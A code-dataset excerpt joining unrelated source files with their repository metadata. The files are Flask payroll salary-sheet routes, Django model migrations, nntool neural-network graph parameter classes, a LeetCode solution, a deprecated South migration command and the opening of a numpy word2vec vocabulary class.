@bp.route('/salary_sheet/process', methods=['POST'])
def process_sheet():
payload = request.json
if payload is not None:
json_data = payload['data']
payload_company = Company.query.filter_by(
id=int(payload['company'])).first()
payload_date = payload['date'].split('-')
payload_date = datetime(
int(payload_date[0]), int(payload_date[1]), int(1))
net_paid = float(0)
net_advance_deduction = float(0)
net_attendence = {}
check_data = SalarySheet.query.filter(SalarySheet.company.any(Company.id == int(payload['company'])),
SalarySheet.month == payload_date)
if check_data.first() is None:
salary = SalarySheet(
payload_date, net_advance_deduction, net_paid, json.dumps(net_attendence))
for item in json_data:
# Debit advance
try:
emp = Employee.query.filter_by(
id=int(item['employee'][0]['id'])).first()
slip_data = SalarySheetSlips(
item['net_adv_deduction'], payload_date)
slip_data.employee.append(emp)
pending_advance = float(
item['net_deduction_month']) + float(item['net_deduction_year'])
if pending_advance is not float(0):
new_data = Advance(advanceamt=float(
item['net_adv_deduction']), trans="debit", date=payload_date, deduction_period="debit")
new_data.employee.append(emp)
new_data.employee.append(payload_company)
db.session.add(new_data)
slip_data.sheet.append(salary)
db.session.add(slip_data)
db.session.commit()
net_paid += float(item['net_payable'])
net_advance_deduction += float(item['net_adv_deduction'])
# Attendece Percentage later
except Exception as e:
print(str(e))
return jsonify({'message': 'Something went wrong. -'+str(e)})
try:
salary.company.append(payload_company)
db.session.add(salary)
db.session.commit()
return jsonify({'success': 'Payroll processed.'})
except Exception as e:
print(str(e))
return jsonify({'message': 'Something went wrong. -'+str(e)})
else:
return jsonify({'message': 'Salary Sheet already processed fo this month.'})
# Save payroll info - paid out , advances paid out ,deductions & attendence
else:
return jsonify({'message': 'Empty data recieved.'})
@bp.route('/salary_sheet/generate', methods=['POST'])
def salary_generate_sheet():
if request.method == 'POST':
if request.json != None:
try:
payload = request.json
company = payload['company']
month = payload['month']
return generate_sheet(company, month)
except Exception as e:
print(str(e))
return jsonify({'message': 'Data not entered for required company & month.'})
@bp.route('/salary_sheet/get/processed', methods=['POST'])
def get_processed_sheet():
payload = request.json
if payload is not None:
payload_date = payload['date'].split('-')
payload_date = datetime(
int(payload_date[0]), int(payload_date[1]), int(1))
check_data = SalarySheet.query.filter(SalarySheet.company.any(Company.id == int(payload['company'])),
SalarySheet.month == payload_date).first()
if check_data is not None:
saved_data = SalarySheetSlips.query.filter(
SalarySheetSlips.sheet.any(SalarySheet.id == int(check_data.id))).all()
try:
generate_data = json.loads(generate_sheet(
payload['company'], payload['date']).data)
for item in generate_data:
for slip in saved_data:
if (item['employee'][0]['id'] == slip.employee[0].id):
item['net_adv_deduction'] = slip.adv_deduction
json_data = json.dumps(generate_data)
return jsonify({'data': json_data})
except Exception as e:
print(str(e))
return jsonify({'message': 'Data not entered for required company & month.'})
else:
return jsonify({'data': None})
def generate_sheet(company, month):
# Payload Date from User
payload_date = month.split('-')
payload_date = datetime(
int(payload_date[0]), int(payload_date[1]), int(1))
# Attendence data for company and month
att_data = Attendence.query.filter(
Attendence.company.any(Company.id == int(company)), Attendence.date == payload_date).all()
# For year range
today = payload_date
year_start = datetime(today.year, 1, 1)
year_end = datetime(today.year+1, 1, 1)
att_data_schema = AttendenceSchema(many=True)
json_att_data = json.loads(att_data_schema.dumps(att_data))
adv_data_schema = AdvanceSchema(many=True)
att_rules = AttendenceRules.query.first()
late_comin_ratio = float(
att_rules.late_comin_day / att_rules.late_comin)
early_going_ratio = float(
att_rules.early_going_day / att_rules.early_going)
for att_item in json_att_data:
att_item['advance'] = []
att_item['deductions'] = {}
att_item['deductions']['month'] = []
att_item['days_payable_late'] = late_comin_ratio * \
att_item['latecomin']
att_item['days_payable_early'] = early_going_ratio * \
att_item['earlygoing']
att_item['days_payable'] = round(
att_item['daysatt'] - (att_item['days_payable_late'] + att_item['days_payable_early']), 2)
att_item['pay_1'] = float(
att_item['days_payable']) * (float(att_item['employee'][0]['basicpay']) / 30)
att_item['deductions']['year'] = []
# Includes deduction from the month
adv_data = Advance.query.filter(
Advance.employee.any(Employee.id == int(att_item['employee'][0]['id']))).all()
json_adv_data = json.loads(adv_data_schema.dumps(adv_data))
net_advance_month = 0
net_advance_year = 0
net_deduction_month = 0
net_deduction_year = 0
outstanding_advance = float(0)
for item in adv_data:
if (item.trans == 'credit'):
outstanding_advance += float(item.advanceamt)
elif (item.trans == 'debit'):
outstanding_advance -= float(item.advanceamt)
for adv_item in json_adv_data:
if adv_item['deduction_period'] == 'month':
net_advance_month += float(adv_item['advanceamt'])
net_deduction_month += float(adv_item['deduction'])
# net_advance += float(-100)
att_item['deductions']['month'].append(
adv_item['deduction'])
if adv_item['deduction_period'] == 'year':
if payload_date.month is 12:
net_advance_year += float(adv_item['advanceamt'])
net_deduction_year += float(adv_item['deduction'])
# net_advance += float(-100)
att_item['deductions']['year'].append(
adv_item['deduction'])
if net_advance_month > net_deduction_month:
pass
elif net_advance_month <= net_deduction_month:
att_item['deductions']['month'] = [ net_advance_month ]
if net_advance_year > net_deduction_year:
pass
elif net_advance_year <= net_deduction_year:
att_item['deductions']['year'] = [ net_advance_year ]
# Setting to 0 if balance is 0
if float(net_advance_month) is float(0):
att_item['deductions']['month'] = 0
att_item['deductions']['month'] = 0
if float(net_advance_year) is float(0):
att_item['deductions']['year'] = 0
att_item['deductions']['year'] = 0
if att_item['other_deduction'] is None:
att_item['other_deduction'] = float(0)
if att_item['esi'] is None:
att_item['esi'] = float(0)
if att_item['pf'] is None:
att_item['pf'] = float(0)
if att_item['tds'] is None:
att_item['tds'] = float(0)
att_item['net_deduction_month'] = float(net_deduction_month)
att_item['net_deduction_year'] = float(net_deduction_year)
net_deduction_advance = float(
net_deduction_month) + float(net_deduction_year)
if outstanding_advance <= net_deduction_advance:
att_item['net_adv_deduction'] = outstanding_advance
else:
att_item['net_adv_deduction'] = net_deduction_advance
att_item['total_deductions'] = float(net_deduction_month) + float(att_item['esi']) + float(att_item['pf']) + float(
att_item['tds'])+float(att_item['other_deduction']) + float(att_item['net_deduction_year'])
att_item['net_payable'] = float(
att_item['pay_1'] - att_item['total_deductions'])
return jsonify(json_att_data)
| [
"[email protected]"
] | |
75feb3ce4229e0efe551dc66ab9dae7d424d9978 | 1e7848dba44ff52cf7d36b4fd61370553cbb7635 | /blog/migrations/0001_initial.py | d2843b047f35b6762c26fb76b30e3a6b5919ff82 | [] | no_license | Maxpridy/practicedjango | 5ea22b554b054112cc066026aa0f617127caa04e | 940a10b1f945a6e8e6f6e28895d99553dfee96e0 | refs/heads/master | 2021-01-19T22:01:17.449937 | 2017-04-10T07:49:38 | 2017-04-10T07:49:38 | 88,738,293 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-04-10 05:50
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
9e4be8d41a15c6d3bccd99feb81baf8a2f664f48 | b156863223814b24f29bcf30cc46abeac21c777e | /tools/nntool/graph/types/others.py | 245aaf04b68ff5a5ffd8f1eaa80aeeb232ca9775 | [
"AGPL-3.0-or-later",
"AGPL-3.0-only",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"Apache-2.0"
] | permissive | VishalSharma0309/gap_sdk | 9dc1a2dda3f99936eeff7bbe2da9755adf6e3eb7 | 09ccc594a3696a84953b732022cecae11e751c97 | refs/heads/master | 2023-07-04T20:53:39.872992 | 2021-08-23T03:53:11 | 2021-08-23T03:53:11 | 274,509,235 | 0 | 0 | Apache-2.0 | 2021-08-23T03:53:12 | 2020-06-23T21:08:16 | C | UTF-8 | Python | false | false | 21,578 | py | # Copyright (C) 2020 GreenWaves Technologies, SAS
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import logging
import sys
import numpy as np
from graph.dim import Dim
from utils.formatters import FORMAT_CHANGES, NORMALIZATIONS
from .base import (NoSizeChangeParameters, Parameters,
SameNumberOfDimensionsForInputs, SensitiveToOrder,
SingleInputAndOutput, Transposable)
LOG = logging.getLogger("nntool." + __name__)
class InputOutputParameters(Transposable):
def __init__(self, *args, dims=None, fixed_order=False, **kwargs):
super().__init__(*args, **kwargs)
self._output_value = None
self._index = None
self.dims = dims
self.fixed_order = fixed_order
self.at_options.valid_options['ALLOCATE'] = int
self.at_options.valid_options['FIXED_ORDER'] = int
self.at_options.fixed_order = 0
@property
def fixed_order(self):
return self.at_options.fixed_order == 1
@fixed_order.setter
def fixed_order(self, val):
self.at_options.fixed_order = 1 if val else 0
@property
def output_value(self):
return self._output_value
@output_value.setter
def output_value(self, value):
self._output_value = value
@property
def index(self):
return self._index
@index.setter
def index(self, value):
self._index = value
@property
def can_equalize(self):
return False
def get_parameter_size(self):
return 0
def clone(self, name, groupn=None):
raise NotImplementedError()
class InputBaseParameters(InputOutputParameters):
@property
def in_dims(self):
dim = self.dims.clone()
if self.in_dims_hint:
dim.apply_naming_hints(self.in_dims_hint[0])
return [dim]
@in_dims.setter
def in_dims(self, val):
pass
def __str__(self):
return "I {} {} {}".format(
self.dims,
Transposable.__str__(self),
self.at_options
)
def get_output_size(self, _):
out_dim = self.dims.clone()
if self.transpose_out:
out_dim.transpose(self.transpose_out)
if self.out_dims_hint:
out_dim.apply_naming_hints(self.out_dims_hint[0])
return [out_dim]
class InputParameters(InputBaseParameters):
op_name = "input"
def set_input(self, value):
try:
value = value.reshape(self.dims.shape)
except ValueError as ex:
trace_back = sys.exc_info()[2]
raise ValueError(
"Input data dimensions are not compatible with graph input: {!s}".format(ex)
).with_traceback(trace_back)
self.output_value = value
def clone(self, name, groupn=None):
raise NotImplementedError()
# @property
# def can_promoteq(self):
# return self.out_q.bits < STATS_BITS[-1]
# def promoteq(self):
# if self.out_q.bits == STATS_BITS[-1]:
# raise ValueError("can't step further")
# self.out_q = get_quantization(self.activation_stats, None, self.out_q.bits * 2)
# return True
class ImageFormatParameters(Parameters, SingleInputAndOutput, SensitiveToOrder):
op_name = "image_format"
NORMALIZATIONS = NORMALIZATIONS
FORMAT_CHANGES = FORMAT_CHANGES
def __init__(self, *args, norm_func=None, format_change=None, **kwargs):
self._norm_func = None
self._format_change = None
super(ImageFormatParameters, self).__init__(*args, **kwargs)
self.norm_func = norm_func
self.format_change = format_change
@property
def input_channels(self):
if self.format_change in ("RGB565_RGB888", "BW8", "BW16"):
return 1
if self.format_change in ("RGB888", "RGB16"):
return 3
return None
@property
def input_dtype(self):
if self.format_change == "RGB565_RGB888":
return np.uint16
if self.format_change in ("RGB888", "BW8", "BW16", "RGB16"):
return np.uint8
return None
@property
def output_channels(self):
if self.format_change in ("RGB565_RGB888", "RGB888", "RGB16"):
return 3
if self.format_change in ("BW8", "BW16"):
return 1
return None
@property
def output_dtype(self):
if self.norm_func in ("SHIFT_INT8", "OFFSET_INT8"):
return np.int8
if self.norm_func in "OUT_INT16":
return np.int16
return None
@property
def format_change(self):
# RGB565_RGB888
return self._format_change
@format_change.setter
def format_change(self, val):
val = val and val.upper()
if val is not None and val not in self.FORMAT_CHANGES:
raise ValueError("format change is not valid")
self._format_change = val
@property
def norm_func(self):
# None, "shift", "offset"
return self._norm_func
@norm_func.setter
def norm_func(self, val):
val = val and val.upper()
if val is not None and val not in self.NORMALIZATIONS:
raise ValueError("normalization is not valid")
self._norm_func = val
def get_parameter_size(self):
return 0
def get_output_size(self, in_dims):
assert len(in_dims) == 1
self.in_dims = self.clone_dim_with_hints(in_dims, hint_dir='in')
out_dim = self.clone_dim_with_hints(in_dims, hint_dir='out')[0]
if self.format_change == "RGB565_RGB888":
assert out_dim.is_named and out_dim.c == 1
out_dim.impose_order(self.out_dims_hint[0])
out_dim.c = 3
elif self.format_change in ("BW8", "BW16"):
assert out_dim.is_named and out_dim.c == 1
out_dim.impose_order(self.out_dims_hint[0])
elif self.format_change in ("RGB888", "RGB16"):
assert out_dim.is_named and out_dim.c == 3
out_dim.impose_order(self.out_dims_hint[0])
else:
raise ValueError("unknow format change")
return [out_dim]
@property
def can_equalize(self):
return False
def clone(self, name, groupn=None):
raise NotImplementedError()
def __str__(self):
return "FORMAT_CHANGE Fmt: {} Norm: {}".format(self.format_change, self.norm_func)
class ConstantInputParameters(InputBaseParameters):
op_name = "constant"
def __init__(self, *args, **kwargs):
self.value = None
super(ConstantInputParameters, self).__init__(*args, **kwargs)
def clone(self, name, groupn=None):
raise NotImplementedError()
def get_parameter_size(self):
return self.dims.size()
def get_parameters(self):
return {'value': self.value}
def set_parameters(self, val):
self.value = val['value']
def __str__(self):
return "Const {} {} {}".format(
self.dims,
Transposable.__str__(self),
self.at_options
)
class OutputParameters(InputOutputParameters):
op_name = "output"
def __init__(self, *args, **kwargs):
super(OutputParameters, self).__init__(*args, **kwargs)
def get_output_size(self, in_dims):
out_dim = in_dims[0].clone()
if self.transpose_in:
out_dim.transpose(self.transpose_in)
return [out_dim]
@property
def out_dims(self):
return [self.dims]
@out_dims.setter
def out_dims(self, val):
self.dims = val[0]
def __str__(self):
return "O {} {} {}".format(
self.dims,
Transposable.__str__(self),
self.at_options
)
def clone(self, name, groupn=None):
raise NotImplementedError()
class TransposeParameters(Transposable, SingleInputAndOutput):
op_name = "transpose"
def __init__(self, *args, transpose=None, **kwargs):
super(TransposeParameters, self).__init__(*args, **kwargs)
self.transpose_in = transpose
def get_parameter_size(self):
return 0
def permute(self, val):
return [val[i] for i in self.transpose_in]
@property
def can_equalize(self):
return False
def real_shape(self):
input_shape = self.in_dims[0].shape
cond_input_idx = [i for i, sz in enumerate(self.in_dims[0].shape) if sz != 1]
real_transpose = [i for i in self.transpose_in if i in cond_input_idx]
cond_input_shape = [input_shape[i] for i in cond_input_idx]
cond_transpose = [cond_input_idx.index(i) for i in real_transpose]
return tuple(cond_input_shape), tuple(cond_transpose)
@property
def transpose_dimension(self):
if self._transpose_in is None:
return 1
return len(self.transpose_in)
@property
def transpose_out(self):
return self._transpose_in
@transpose_out.setter
def transpose_out(self, val):
self._transpose_in = val
def get_output_size(self, in_dims):
self.in_dims = self.clone_dim_with_hints(in_dims)
out_dim = in_dims[0].clone()
if self.transpose_in:
out_dim = out_dim.transpose(self.transpose_in)
return [out_dim]
def clone(self, name, groupn=None):
raise NotImplementedError()
def __str__(self):
return "T {} {}".format(
self.transpose_in and ','.join([str(i) for i in self.transpose_in]) or "None",
self.at_options
)
class ConcatParameters(Transposable):
op_name = "concat"
def __init__(self, *args, axis=None, axis_hint=None, **kwargs):
super(ConcatParameters, self).__init__(*args, **kwargs)
self._axis = axis
self._axis_hint = axis_hint
@property
def axis(self):
return self._axis
@axis.setter
def axis(self, val):
self._axis = val
def get_parameter_size(self):
return 0
@property
def can_equalize(self):
return False
def get_output_size(self, in_dims):
if in_dims[0].is_named and self._axis_hint:
self._axis = in_dims[0].get_order_idx(self._axis_hint)
self.in_dims = self.clone_dim_with_hints(in_dims)
if self.transpose_in:
in_dims = [in_dim.clone().transpose(self.transpose_in) for in_dim in in_dims]
out_dim = Dim.combine([in_dim for in_dim in in_dims], self.axis)
if self.transpose_out:
out_dim.transpose(self.transpose_out)
return [out_dim]
def clone(self, name, groupn=None):
raise NotImplementedError()
def __str__(self):
return "A {} {} {}".format(
self.axis,
Transposable.__str__(self),
self.at_options
)
class GroupParameters(Parameters, SensitiveToOrder):
op_name = "group"
def __init__(self, name, groups, in_dims_hint=None, out_dims_hint=None):
super(GroupParameters, self).__init__(name,
in_dims_hint=in_dims_hint,
out_dims_hint=out_dims_hint)
self.groups = groups
def get_parameter_size(self):
return 0
def get_output_size(self, in_dims):
assert len(in_dims) == 1
self.in_dims = self.clone_dim_with_hints(in_dims)
in_dims = self.in_dims[0]
assert in_dims.c % self.groups == 0
out_edges = in_dims.c // self.groups
out_c = in_dims.c // out_edges
out_dim = in_dims.clone(['c', 'h', 'w'])
out_dim.c = out_c
out_dim.impose_order(in_dims.order)
return [out_dim]
@property
def can_equalize(self):
return False
def clone(self, name, groupn=None):
raise NotImplementedError()
def __str__(self):
return "GRPS {}".format(
self.groups
)
class PadParameters(Parameters, SingleInputAndOutput, SensitiveToOrder):
op_name = "pad"
def __init__(self, name, padding, in_dims_hint=None, out_dims_hint=None):
super(PadParameters, self).__init__(name,
in_dims_hint=in_dims_hint,
out_dims_hint=out_dims_hint)
self.padding = padding
self.pad_type = "zero"
def get_parameter_size(self):
return 0
def get_output_size(self, in_dims):
assert len(in_dims) == 1
self.in_dims = self.clone_dim_with_hints(in_dims)
out_dim = self.in_dims[0].clone()
out_dim.w += self.padding.w
out_dim.h += self.padding.h
return [out_dim]
@property
def can_equalize(self):
return True
def clone(self, name, groupn=None):
raise NotImplementedError()
def __str__(self):
return "PAD {}".format(self.padding)
class GlobalPoolParameters(Parameters, SingleInputAndOutput, SensitiveToOrder):
op_name = "global"
def __init__(self, name, pool_type="average", in_dims_hint=None, out_dims_hint=None):
super(GlobalPoolParameters, self).__init__(name,
in_dims_hint=in_dims_hint,
out_dims_hint=out_dims_hint)
self.pool_type = pool_type
def get_parameter_size(self):
return 0
def get_output_size(self, in_dims):
assert len(in_dims) == 1
self.in_dims = self.clone_dim_with_hints(in_dims)
out_dim = self.in_dims[0].clone()
out_dim.w = 1
out_dim.h = 1
return [out_dim]
@property
def can_equalize(self):
return True
def clone(self, name, groupn=None):
raise NotImplementedError()
def __str__(self):
return "GLOBAL {}".format(self.pool_type)
class UpsampleParameters(Parameters, SingleInputAndOutput, SensitiveToOrder):
op_name = "upsample"
def __init__(self, name, algo, factor, in_dims_hint=None, out_dims_hint=None):
super(UpsampleParameters, self).__init__(name,
in_dims_hint=in_dims_hint,
out_dims_hint=out_dims_hint)
self.algo = algo
self.factor = factor
def get_parameter_size(self):
return 0
def get_output_size(self, in_dims):
assert len(in_dims) == 1
self.in_dims = self.clone_dim_with_hints(in_dims)
in_dims = in_dims[0]
out_dim = in_dims.clone()
out_dim = out_dim * self.factor
out_dim.impose_order(in_dims.order)
return [out_dim]
@property
def can_equalize(self):
return False
def clone(self, name, groupn=None):
raise NotImplementedError()
def __str__(self):
return "A {} factor {}".format(
self.algo,
self.factor
)
class ReshapeParameters(Transposable, SingleInputAndOutput):
'''This class covers reshapes and transposes'''
op_name = "reshape"
def __init__(self, *args, old_shape=None, shape=None, **kwargs):
super(ReshapeParameters, self).__init__(*args, **kwargs)
if not isinstance(shape, Dim):
shape = Dim.unnamed(shape)
self._shape = shape
self._old_shape = old_shape
def does_nothing(self):
return self.shape.layout_shape == self.old_shape.layout_shape
def get_parameter_size(self):
return 0
def get_output_size(self, in_dims):
assert len(in_dims) == 1
self.in_dims = self.clone_dim_with_hints(in_dims)
in_dim = in_dims[0]
self._old_shape = in_dim
assert in_dim.size() == self.shape.size(), "in shape does not match in size"
out = self.shape.clone()
if self.transpose_out:
out.transpose(self.transpose_out)
return [out]
@property
def shape(self):
return self._shape
@shape.setter
def shape(self, val):
self._shape = val
@property
def old_shape(self):
return self._old_shape
@old_shape.setter
def old_shape(self, val):
self._old_shape = val
@property
def can_equalize(self):
return False
def clone(self, name, groupn=None):
raise NotImplementedError()
def __str__(self):
return "SHAPE {} {}".format(
self.shape,
Transposable.__str__(self)
)
class YoloParameters(NoSizeChangeParameters, SingleInputAndOutput, SensitiveToOrder):
op_name = "yolo"
def __init__(self, name, classes, total, mask, max_boxes):
super(YoloParameters, self).__init__(name)
self.classes = classes
self.total = total
self.mask = mask
self.max_boxes = max_boxes
def get_parameter_size(self):
return 0
@property
def can_equalize(self):
return False
def clone(self, name, groupn=None):
raise NotImplementedError()
def __str__(self):
return "C {} T {} MSK {} MAX {}".format(
self.classes, self.total, self.mask, self.max_boxes
)
class MatrixBroadcastedLinearOpParameters(Parameters, SameNumberOfDimensionsForInputs):
@property
def can_equalize(self):
return False
def get_parameter_size(self):
return 0
def clone(self, name, groupn=None):
raise NotImplementedError()
def compute_load(self):
return self.out_dims[0].size() * 2
def get_output_size(self, in_dims):
self.in_dims = self.clone_dim_with_hints(in_dims)
max_idx, _ = max(enumerate(self.in_dims), key=lambda x: x[1].size())
return [self.in_dims[max_idx]]
def __str__(self):
return "{} {}".format(self.op_name, self.at_options)
class MatrixAddParameters(MatrixBroadcastedLinearOpParameters):
op_name = "add"
class MatrixMulParameters(MatrixBroadcastedLinearOpParameters):
op_name = "mul"
class MatrixSubParameters(MatrixBroadcastedLinearOpParameters):
op_name = "sub"
class MatrixDivParameters(MatrixBroadcastedLinearOpParameters):
op_name = "div"
class SoftMaxParameters(NoSizeChangeParameters, SingleInputAndOutput, SensitiveToOrder):
op_name = "softmax"
def __init__(self, name, beta):
super(SoftMaxParameters, self).__init__(name)
self.beta = beta
def get_parameter_size(self):
return 0
@property
def can_equalize(self):
return False
def clone(self, name, groupn=None):
raise NotImplementedError()
def compute_load(self):
return self.in_dims[0].size() * 2
def __str__(self):
return "BETA {} {}".format(
self.beta,
self.at_options
)
# pylint: disable=abstract-method
class NoOPParameters(NoSizeChangeParameters, SingleInputAndOutput):
op_name = "noop"
def __init__(self, name, desc=""):
super(NoOPParameters, self).__init__(name)
self._desc = desc
def get_parameter_size(self):
return 0
@property
def can_equalize(self):
return False
def clone(self, name, groupn=None):
raise NotImplementedError()
def compute_load(self):
return 0
def __str__(self):
return "NOOP {}".format(
self._desc
)
class UnexecutableOpParameters(Parameters):
pass
class UnconvertedOpParameters(UnexecutableOpParameters):
def __init__(self, name, indicated_op_name, expected_inputs, indicated_outputs, info):
super(UnconvertedOpParameters, self).__init__(name)
self.info = info
self.expected_inputs = expected_inputs
self.indicated_outputs = indicated_outputs
self.indicated_op_name = indicated_op_name
@property
def op_name(self):
return self.indicated_op_name
def get_output_size(self, in_dims):
if self.indicated_outputs:
return self.indicated_outputs
self.in_dims = self.clone_dim_with_hints(in_dims)
if len(self.in_dims) == 1:
return [self.in_dims[0]]
return [Dim.unknown()]
@property
def can_equalize(self):
return False
def get_parameter_size(self):
return 0
def clone(self, name, groupn=None):
raise NotImplementedError()
def __str__(self):
return self.indicated_op_name
class UnknownOpParameters(UnexecutableOpParameters):
def __init__(self, name, info):
super(UnknownOpParameters, self).__init__(name)
self.info = info
def get_output_size(self, in_dims):
self.in_dims = self.clone_dim_with_hints(in_dims)
if len(self.in_dims) == 1:
return [self.in_dims[0]]
return [Dim.unknown()]
@property
def can_equalize(self):
return False
def get_parameter_size(self):
return 0
def clone(self, name, groupn=None):
raise NotImplementedError()
def __str__(self):
return "Unknown"
| [
"[email protected]"
] | |
5f18454f014b6f708d18d693c3cd5b6a8f151544 | b1a6ad54e1094b84d3e4b16e1bcaa1922a2eff9c | /products/migrations/0001_initial.py | a1be93bdd50ebef4a4b02d1b43fc8c94c1635c86 | [] | no_license | lesproduweb/africanStore | e9e098455b6bbbb10b04cd8e2729b64fdac55e71 | 95c0a3c04f08dc27d7decc5a9c30ae7d0a2b48a8 | refs/heads/master | 2023-06-15T01:26:48.955407 | 2021-07-10T06:28:15 | 2021-07-10T06:28:15 | 381,659,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,039 | py | # Generated by Django 3.2.4 on 2021-06-30 06:58
from django.db import migrations, models
import products.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=120)),
('slug', models.SlugField(blank=True, unique=True)),
('description', models.TextField()),
('price', models.DecimalField(decimal_places=2, default=39.99, max_digits=20)),
('image', models.ImageField(blank=True, null=True, upload_to=products.models.upload_image_path)),
('featured', models.BooleanField(default=False)),
('active', models.BooleanField(default=True)),
('timestamp', models.TimeField(auto_now=True)),
],
),
]
| [
"[email protected]"
] | |
c44e16e725d15095945f1ae592038de226dad0b1 | 6ec209c1f6f3ca8017a5373ba2e85da38dfda90c | /array/128.py | a5640d6b558db8023edab49d991eb9cead49a8b6 | [
"Apache-2.0"
] | permissive | MingfeiPan/leetcode | a70192233f7112ce39cc7b09d782bdcc52d29d06 | 057d9f014cf207ab4e50e14e5a9e015724de1386 | refs/heads/master | 2022-05-09T01:40:39.599374 | 2022-04-10T15:03:07 | 2022-04-10T15:03:07 | 60,593,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | #for loop + while loop看似两层循环, 但是while loop只会出现在n-1 is None的情况下 所以 整体时间复杂度O(n)
class Solution:
def longestConsecutive(self, nums: List[int]) -> int:
num_set = set(nums)
ret = 0
for num in num_set:
if num - 1 not in num_set:
cur_len = 1
while num + 1 in num_set:
cur_len += 1
num += 1
ret = max(ret, cur_len)
return ret
| [
"[email protected]"
] | |
b81c44ba1cc0b90044f10dc4f6460cf0f053c32b | 5cfc4c94bf158ec45d39c484ebb9740460d8e2d7 | /venv/lib/python3.7/site-packages/south/management/commands/startmigration.py | e4fcf458c9de830b02c6f2d0ee9fa96fb62059c5 | [
"Apache-2.0"
] | permissive | r34g4n/ADT_booking | 917060cc95ee2c9eeea2fec69ea0d1335c43cca2 | 57c5bb103ac8bc1cf4d2c4f8b52744bd763560fb | refs/heads/promoted-slave | 2022-11-30T16:14:21.582830 | 2019-08-27T08:20:50 | 2019-08-27T08:20:50 | 197,391,546 | 0 | 1 | Apache-2.0 | 2022-11-22T03:57:27 | 2019-07-17T13:06:50 | Python | UTF-8 | Python | false | false | 2,113 | py | """
Now-obsolete startmigration command.
"""
from __future__ import print_function
from optparse import make_option
from django.core.management.base import BaseCommand
from django.core.management.color import no_style
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--model', action='append', dest='added_model_list', type='string',
help='Generate a Create Table migration for the specified model. Add multiple models to this migration with subsequent --add-model parameters.'),
make_option('--add-field', action='append', dest='added_field_list', type='string',
help='Generate an Add Column migration for the specified modelname.fieldname - you can use this multiple times to add more than one column.'),
make_option('--add-index', action='append', dest='added_index_list', type='string',
help='Generate an Add Index migration for the specified modelname.fieldname - you can use this multiple times to add more than one column.'),
make_option('--initial', action='store_true', dest='initial', default=False,
help='Generate the initial schema for the app.'),
make_option('--auto', action='store_true', dest='auto', default=False,
help='Attempt to automatically detect differences from the last migration.'),
make_option('--freeze', action='append', dest='freeze_list', type='string',
help='Freeze the specified model(s). Pass in either an app name (to freeze the whole app) or a single model, as appname.modelname.'),
make_option('--stdout', action='store_true', dest='stdout', default=False,
help='Print the migration to stdout instead of writing it to a file.'),
)
help = "Deprecated command"
def handle(self, app=None, name="", added_model_list=None, added_field_list=None, initial=False, freeze_list=None, auto=False, stdout=False, added_index_list=None, **options):
print("The 'startmigration' command is now deprecated; please use the new 'schemamigration' and 'datamigration' commands.")
| [
"[email protected]"
] | |
18d4eb15b17099de6e64885e76ef46e3eb22192b | 69f893832b34ef370c7ae5a3d03107cdfb936bdc | /numpy_implementation_rough.py | 4e385c4fa8a5b96c8c1af6d254b1c15c0884d098 | [
"Apache-2.0"
] | permissive | Ayushi20023/Training-domain-specific-word-embeddings | 766783bbf293bca721f19ffb515c3caf7aa0d77a | bc0ae5c97ecd7bbb6f3d066a3bd3629d09c0f409 | refs/heads/master | 2021-06-10T05:10:24.689405 | 2017-01-05T09:43:00 | 2017-01-05T09:43:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,391 | py | import argparse
import math
import struct
import sys
import time
import warnings
import pickle
import string
from bs4 import BeautifulSoup
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
import numpy as np
import matplotlib.pyplot as plt
from scipy import spatial
from sklearn.manifold import TSNE
from multiprocessing import Array
from bs4 import BeautifulSoup
class VocabItem:
def __init__(self, word):
self.word = word
self.count = 0
self.path = None # Path (list of indices) from the root to the word (leaf)
self.code = None # Huffman encoding
class Vocab:
def __init__(self, fi, min_count):
vocab_items = []
vocab_hash = {}
word_count = 0
fi = open(fi, 'r')
# Add special tokens <bol> (beginning of line) and <eol> (end of line)
for token in ['<bol>', '<eol>']:
vocab_hash[token] = len(vocab_items)
vocab_items.append(VocabItem(token))
for line in fi:
tokens = line.split()
for token in tokens:
if token not in vocab_hash:
vocab_hash[token] = len(vocab_items)
vocab_items.append(VocabItem(token))
# assert vocab_items[vocab_hash[token]].word == token, 'Wrong vocab_hash index'
vocab_items[vocab_hash[token]].count += 1
word_count += 1
if word_count % 10000 == 0:
sys.stdout.write("\rReading word %d" % word_count)
sys.stdout.flush()
# Add special tokens <bol> (beginning of line) and <eol> (end of line)
vocab_items[vocab_hash['<bol>']].count += 1
vocab_items[vocab_hash['<eol>']].count += 1
word_count += 2
self.bytes = fi.tell()
self.vocab_items = vocab_items # List of VocabItem objects
self.vocab_hash = vocab_hash # Mapping from each token to its index in vocab
self.word_count = word_count # Total number of words in train file
# Add special token <unk> (unknown),
# merge words occurring less than min_count into <unk>, and
# sort vocab in descending order by frequency in train file
self.__sort(min_count)
